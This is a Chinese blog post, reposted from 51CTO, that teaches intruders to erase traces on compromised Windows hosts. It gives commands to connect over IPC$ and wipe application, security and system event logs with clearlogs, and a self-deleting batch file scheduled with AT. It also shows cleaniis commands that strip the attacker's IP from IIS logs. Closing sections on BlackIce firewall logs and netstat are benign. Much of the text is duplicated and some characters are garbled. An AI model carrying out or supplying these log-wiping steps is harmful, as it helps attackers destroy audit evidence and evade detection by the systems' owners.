清理你入侵后的痕迹
應用程序日志、
安全日志、
系統(tǒng)日志、
DNS日志默認位置:%systemroot%\system32\config,默認文件大小512KB,管理員都會改變這個默認大小。安全日志文件:%systemroot%\system32\config\SecEvent.EVT
系統(tǒng)日志文件:%systemroot%\system32\config\SysEvent.EVT
應用程序日志文件:%systemroot%\system32\config\AppEvent.EVT
FTP日志默認位置:%systemroot%\system32\logfiles\msftpsvc1\,默認每天一個
WWW日志默認位置:%systemroot%\system32\logfiles\w3svc1\,默認每天一個日志
以上日志在注冊表里的鍵: 應用程序日志,安全日志,系統(tǒng)日志,DNS服務器日志,
它們這些LOG文件在注冊表中的:
HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Eventlog
鑰匙(表示成功)和鎖(表示當用戶在做什么時被系統(tǒng)停止)。接連四個鎖圖標,表示四次失敗審核,事件類型是帳戶登錄和登錄、注銷失敗
怎樣刪除這些日志: 通過上面,得知日志文件通常有某項服務在后臺保護,除了系統(tǒng)日志、安全日志、應用程序日志等等,它們的服務是Windos2000的關鍵進程,而且與注冊表文件在一塊,當Windows2000啟動后,啟動服務來保護這些文件,所以很難刪除.
下面就是很難的安全日志和系統(tǒng)日志了,守護這些日志的服務是Event Log,試著停掉它! D:\SERVER\system32\LogFiles\W3SVC1>net stop eventlog 這項服務無法接受請求的"暫停" 或"停止" 操作。
怎么清除系統(tǒng)日志.
怎么利用工具清除IIS日志
怎么清除歷史和cookie
怎么察看防火墻Blackice的日志
netstat -an 表示的什么意思
===================================
1.系統(tǒng)日志 通過手工很難清除. 這里我們介紹一個工具 clearlog.exe
使用方法:
Usage: clearlogs [\\computername] <-app / -sec / -sys>
-app = 應用程序日志
-sec = 安全日志
-sys = 系統(tǒng)日志
a. 可以清除遠程計算機的日志
** 先用ipc連接上去: net use \\ip\ipc$ 密碼/user:用戶名
** 然后開始清除: 方法
clearlogs \\ip -app 這個是清除遠程計算機的應用程序日志
clearlogs \\ip -sec 這個是清除遠程計算機的安全日志
clearlogs \\ip -sys 這個是清除遠程計算機的系統(tǒng)日志
b.清除本機日志: 如果和遠程計算機的不能空連接. 那么就需要把這個工具傳到遠程計算機上面
然后清除. 方法:
clearlogs -app 這個是清除遠程計算機的應用程序日志
clearlogs -sec 這個是清除遠程計算機的安全日志
clearlogs -sys 這個是清除遠程計算機的系統(tǒng)日志
安全日志已經(jīng)被清除.Success: The log has been cleared 成功.
為了更安全一點.同樣你也可以建立一個批處理文件.讓自動清除. 做好批處理文件.然后用at命令建立一個計劃任務. 讓自動運行. 之后你就可以離開你的肉雞了.
例如建立一個 c.bat
rem ============================== 開始
@echo off
clearlogs -app
clearlogs -sec
clearlogs -sys
del clearlogs.exe
del c.bat
exit
rem ============================== 結束
在你的計算機上面測試的時候 可以不要 @echo off 可以顯示出來. 你可以看到結果
第一行表示: 運行時不顯示窗口
第二行表示: 清除應用程序日志
第三行表示: 清除安全日志
第四行表示: 清除系統(tǒng)日志
第五行表示: 刪除 clearlogs.exe 這個工具
第六行表示: 刪除 c.bat 這個批處理文件
第七行表示: 退出
用AT命令. 建立一個計劃任務. 這個命令在原來的教程里面和雜志里面都有. 你可以去看看詳細的使用方法
AT 時間 c:\c.bat
之后你就可以安全離開了. 這樣才更安全一點.
===================================
2.清除iis日志:
工具:cleaniis.exe
使用方法:
iisantidote <logfile dir> <ip or string to hide>
iisantidote <logfile dir><ip or string to hide> stop
stop opiton will stop iis before clearing the files and restart it after
<logfile dir> exemple : c:\winnt\system32\logfiles\w3svc1\ dont forget the \
使用方法解釋:
cleaniis.exe iis日志存放的路徑 清除參數(shù)
什么意思呢??我來給大家舉個例子吧:
cleaniis c:\winnt\system32\logfiles\w3svc1\ 192.168.0.1
飧霰硎廄宄齦og中所有此IP(192.168.0.1)地址的訪問記錄. -----推薦使用這種方法
cleaniis c:\winnt\system32\logfiles\w3svc1\ /shop/admin/
這個表示清除這個目錄里面的所以的日志
c:\winnt\system32\logfiles\w3svc1 代表是iis日志的位置(windows nt/2000) 這個路徑可以改變
c:\windows\system32\logfiles\w3svc1 代表是iis日志的位置(windows xp/2003) 這個路徑可以改變
這個測試表示 在日志里面沒有這個ip地址.
我們看一下日志的路徑 再來看一下
我們的ip(192.168.0.1)已經(jīng)沒有了.
已經(jīng)全部清空.
同樣這個也可以建立批處理. 方法同上面的那個.
===================================
3.清除歷史記錄及運行的日志:
cleaner.exe
直接運行就可以了.
===================================
4.察看blackice的日志.
這個地方我們可以清除的看到 防火墻的日志.
這個表示 有人發(fā)過來帶有病毒的email附件. ip是: 220.184.153.116
tcp_probe_other 表示 通過tcp 掃描 或者利用別的和你建立連接 通信
這個表示通過端口 80 掃描iis
病毒 nimda
這里需要很多的計算機協(xié)議知識. 同時也需要對英語有了解
才能更好的分析 如果對英語不好 你可以裝一個金山詞霸.
一般情況下 我們可以 對一些可以不用管.
一般這三種情況 不用去管.
最上面的 critical 這個 可以去關注一下 . 一般是確實有別的計算機掃描或者入侵你的計算機
count 代表次數(shù) intruder 是對方的ip event 是通過什么方式(協(xié)議) 掃描或者想入侵的
time表示時間
5.===================================
netstat -an 表示什么意思?
使用這個命令可以察看到和本機的所有的連接.
Proto Local Address Foreign Address State
協(xié)議 本地端口及IP地址 遠程端口及IP地址 狀態(tài)
LISTENING 監(jiān)聽狀態(tài) 表示等待對方連接
ESTABLISHED 正在連接著.
TCP 協(xié)議是TCP
UDP 協(xié)議是UDP
TCP 192.168.0.10:1115 61.186.97.54:80 ESTABLISHED
這個表示 利用tcp協(xié)議 本機ip(192.168.0.10)通過端口:1115 和遠程ip(61.186.97.54)端口:80連接
80端口 表示 http 就是你在訪問這個網(wǎng)站.
安全日志、
系統(tǒng)日志、
DNS日志默認位置:%systemroot%\system32\config,默認文件大小512KB,管理員都會改變這個默認大小。安全日志文件:%systemroot%\system32\config\SecEvent.EVT
系統(tǒng)日志文件:%systemroot%\system32\config\SysEvent.EVT
應用程序日志文件:%systemroot%\system32\config\AppEvent.EVT
FTP日志默認位置:%systemroot%\system32\logfiles\msftpsvc1\,默認每天一個
WWW日志默認位置:%systemroot%\system32\logfiles\w3svc1\,默認每天一個日志
以上日志在注冊表里的鍵: 應用程序日志,安全日志,系統(tǒng)日志,DNS服務器日志,
它們這些LOG文件在注冊表中的:
HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Eventlog
鑰匙(表示成功)和鎖(表示當用戶在做什么時被系統(tǒng)停止)。接連四個鎖圖標,表示四次失敗審核,事件類型是帳戶登錄和登錄、注銷失敗
怎樣刪除這些日志: 通過上面,得知日志文件通常有某項服務在后臺保護,除了系統(tǒng)日志、安全日志、應用程序日志等等,它們的服務是Windos2000的關鍵進程,而且與注冊表文件在一塊,當Windows2000啟動后,啟動服務來保護這些文件,所以很難刪除.
下面就是很難的安全日志和系統(tǒng)日志了,守護這些日志的服務是Event Log,試著停掉它! D:\SERVER\system32\LogFiles\W3SVC1>net stop eventlog 這項服務無法接受請求的"暫停" 或"停止" 操作。
怎么清除系統(tǒng)日志.
怎么利用工具清除IIS日志
怎么清除歷史和cookie
怎么察看防火墻Blackice的日志
netstat -an 表示的什么意思
===================================
1.系統(tǒng)日志 通過手工很難清除. 這里我們介紹一個工具 clearlog.exe
使用方法:
Usage: clearlogs [\\computername] <-app / -sec / -sys>
-app = 應用程序日志
-sec = 安全日志
-sys = 系統(tǒng)日志
a. 可以清除遠程計算機的日志
** 先用ipc連接上去: net use \\ip\ipc$ 密碼/user:用戶名
** 然后開始清除: 方法
clearlogs \\ip -app 這個是清除遠程計算機的應用程序日志
clearlogs \\ip -sec 這個是清除遠程計算機的安全日志
clearlogs \\ip -sys 這個是清除遠程計算機的系統(tǒng)日志
b.清除本機日志: 如果和遠程計算機的不能空連接. 那么就需要把這個工具傳到遠程計算機上面
然后清除. 方法:
clearlogs -app 這個是清除遠程計算機的應用程序日志
clearlogs -sec 這個是清除遠程計算機的安全日志
clearlogs -sys 這個是清除遠程計算機的系統(tǒng)日志
安全日志已經(jīng)被清除.Success: The log has been cleared 成功.
為了更安全一點.同樣你也可以建立一個批處理文件.讓自動清除. 做好批處理文件.然后用at命令建立一個計劃任務. 讓自動運行. 之后你就可以離開你的肉雞了.
例如建立一個 c.bat
rem ============================== 開始
@echo off
clearlogs -app
clearlogs -sec
clearlogs -sys
del clearlogs.exe
del c.bat
exit
rem ============================== 結束
在你的計算機上面測試的時候 可以不要 @echo off 可以顯示出來. 你可以看到結果
第一行表示: 運行時不顯示窗口
第二行表示: 清除應用程序日志
第三行表示: 清除安全日志
第四行表示: 清除系統(tǒng)日志
第五行表示: 刪除 clearlogs.exe 這個工具
第六行表示: 刪除 c.bat 這個批處理文件
第七行表示: 退出
用AT命令. 建立一個計劃任務. 這個命令在原來的教程里面和雜志里面都有. 你可以去看看詳細的使用方法
AT 時間 c:\c.bat
之后你就可以安全離開了. 這樣才更安全一點.
===================================
2.清除iis日志:
工具:cleaniis.exe
使用方法:
iisantidote <logfile dir> <ip or string to hide>
iisantidote <logfile dir><ip or string to hide> stop
stop opiton will stop iis before clearing the files and restart it after
<logfile dir> exemple : c:\winnt\system32\logfiles\w3svc1\ dont forget the \
使用方法解釋:
cleaniis.exe iis日志存放的路徑 清除參數(shù)
什么意思呢??我來給大家舉個例子吧:
cleaniis c:\winnt\system32\logfiles\w3svc1\ 192.168.0.1
飧霰硎廄宄齦og中所有此IP(192.168.0.1)地址的訪問記錄. -----推薦使用這種方法
cleaniis c:\winnt\system32\logfiles\w3svc1\ /shop/admin/
這個表示清除這個目錄里面的所以的日志
c:\winnt\system32\logfiles\w3svc1 代表是iis日志的位置(windows nt/2000) 這個路徑可以改變
c:\windows\system32\logfiles\w3svc1 代表是iis日志的位置(windows xp/2003) 這個路徑可以改變
這個測試表示 在日志里面沒有這個ip地址.
我們看一下日志的路徑 再來看一下
我們的ip(192.168.0.1)已經(jīng)沒有了.
已經(jīng)全部清空.
同樣這個也可以建立批處理. 方法同上面的那個.
===================================
3.清除歷史記錄及運行的日志:
cleaner.exe
直接運行就可以了.
===================================
4.察看blackice的日志.
這個地方我們可以清除的看到 防火墻的日志.
這個表示 有人發(fā)過來帶有病毒的email附件. ip是: 220.184.153.116
tcp_probe_other 表示 通過tcp 掃描 或者利用別的和你建立連接 通信
這個表示通過端口 80 掃描iis
病毒 nimda
這里需要很多的計算機協(xié)議知識. 同時也需要對英語有了解
才能更好的分析 如果對英語不好 你可以裝一個金山詞霸.
一般情況下 我們可以 對一些可以不用管.
一般這三種情況 不用去管.
最上面的 critical 這個 可以去關注一下 . 一般是確實有別的計算機掃描或者入侵你的計算機
count 代表次數(shù) intruder 是對方的ip event 是通過什么方式(協(xié)議) 掃描或者想入侵的
time表示時間
5.===================================
netstat -an 表示什么意思?
使用這個命令可以察看到和本機的所有的連接.
Proto Local Address Foreign Address State
協(xié)議 本地端口及IP地址 遠程端口及IP地址 狀態(tài)
LISTENING 監(jiān)聽狀態(tài) 表示等待對方連接
ESTABLISHED 正在連接著.
TCP 協(xié)議是TCP
UDP 協(xié)議是UDP
TCP 192.168.0.10:1115 61.186.97.54:80 ESTABLISHED
這個表示 利用tcp協(xié)議 本機ip(192.168.0.10)通過端口:1115 和遠程ip(61.186.97.54)端口:80連接
80端口 表示 http 就是你在訪問這個網(wǎng)站.
一般情況下遠程ip的端口: 80 21 8000 這個都是正常的. 如果是別的 就可以看一下你的計算機了
本文轉自loveme2351CTO博客,原文鏈接:http://blog.51cto.com/loveme23/8530?,如需轉載請自行聯(lián)系原作者
總結
- 上一篇: 利用Zabbix ODBC monito
- 下一篇: 逻辑回归的MATLAB实现(二分类问题)